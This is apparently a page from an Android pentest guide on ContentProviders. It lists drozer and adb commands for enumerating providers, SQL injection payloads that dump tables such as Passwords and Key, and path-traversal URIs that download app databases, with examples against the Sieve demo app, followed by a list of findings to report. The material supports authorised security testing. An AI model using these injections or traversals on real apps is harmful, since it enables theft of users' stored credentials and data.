[A]ndroid [A]pplication [P]entest [G]uide
3.4.2 ContentProvider

DROZER

Info:

run app.provider.info -a com.x.x.x

Path guessing & determining accessible content:

run scanner.provider.finduris -a com.x.x.x

Use the URIs found above, or guess them yourself (the same module also offers app.provider.insert / .update / .delete):

run app.provider.query content://<URI> --vertical

Test content providers for SQL-Injection:

run scanner.provider.injection -a com.x.x.x

Find tables accessible through SQL-Injection:

run scanner.provider.sqltables -a com.x.x.x

SQLi

List all DB tables via the projection, then probe projection and selection with a single quote; the SQLite error text shows whether input lands in the query unescaped:

run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'"
  -> unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'"
  -> unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Example - retrieve data from otherwise protected tables:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

FILESYSTEM-CP

Download the DB (path traversal through the provider URI):

run app.provider.download content://com.x.x.x.ProviderName/../../../../../../../../data/data/com.x.x.x/database.db /home/user/database.db

Find content providers that are susceptible to directory traversal, then read a file through one:

run scanner.provider.traversal -a com.x.x.x
run app.provider.read content://com.x.x.x.ProviderName/path/to/file

Example (/etc/hosts is world-readable anyway -> no finding by itself, but it confirms the traversal works)

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

or

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

ADB

adb shell content query --uri content://com.x.x.x.ProviderName/file_or_path

THINGS TO REPORT

  • Improper use of permissions (no path permissions, no READ/WRITE permissions on the provider)

  • If SQL Injection is possible

    • If a weak hash function (like MD5) was used on passwords or other sensitive data

  • Accessed DB files (which files could be read or downloaded, and what they contained)


Last updated 5 years ago
